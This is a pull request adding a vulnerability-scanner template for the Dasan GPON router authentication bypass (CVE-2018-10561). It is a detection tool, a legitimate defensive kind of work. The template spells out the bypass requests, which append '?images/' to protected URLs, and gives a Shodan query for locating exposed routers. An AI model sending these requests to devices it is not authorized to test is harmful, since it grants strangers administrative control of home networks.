### PR TITLE
Add CVE-2018-10561 template for Dasan GPON Authentication Bypass

### DIFF
--- a/http/cves/2018/CVE-2018-10561.yaml
+++ b/http/cves/2018/CVE-2018-10561.yaml
@@ -1,0 +1,60 @@
+id: CVE-2018-10561
+
+info:
+  name: Dasan GPON Routers - Authentication Bypass
+  author: singhvishalkr
+  severity: critical
+  description: |
+    Dasan GPON home routers are vulnerable to authentication bypass. Remote attackers can bypass authentication by appending specific query strings to any URL that requires authentication, allowing full device management.
+  impact: |
+    An attacker can gain full administrative access to the router without credentials, potentially compromising network security and enabling further attacks.
+  remediation: |
+    Restrict network access to the router management interface and monitor for available firmware updates from the vendor.
+  reference:
+    - https://www.exploit-db.com/exploits/44576
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-10561
+    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2018-10561
+    cwe-id: CWE-287
+    epss-score: 0.97448
+    epss-percentile: 0.99959
+    cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: dasannetworks
+    product: gpon_router_firmware
+    shodan-query: "GPON Home Gateway"
+  tags: cve,cve2018,gpon,dasan,auth-bypass,router,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/menu.html?images/"
+      - "{{BaseURL}}/GponForm/diag_Form?images/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "GponForm"
+          - "diag_action"
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "device_name"
+          - "wan_ip"
+          - "fmwup"
+          - "WAN_Setting"
+        condition: or
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Summary
- Adds detection template for CVE-2018-10561 (Dasan GPON router authentication bypass)
- Authentication can be bypassed by appending ?images/ to protected URLs
- CVSS 9.8 Critical - Unauthenticated, full device compromise possible

## Test Plan
- Template verified against documented exploit behavior
- Strong matchers to avoid false positives (GponForm, diag_action, WAN_Setting)

## References
- https://www.exploit-db.com/exploits/44576
- https://nvd.nist.gov/vuln/detail/CVE-2018-10561

/claim #7549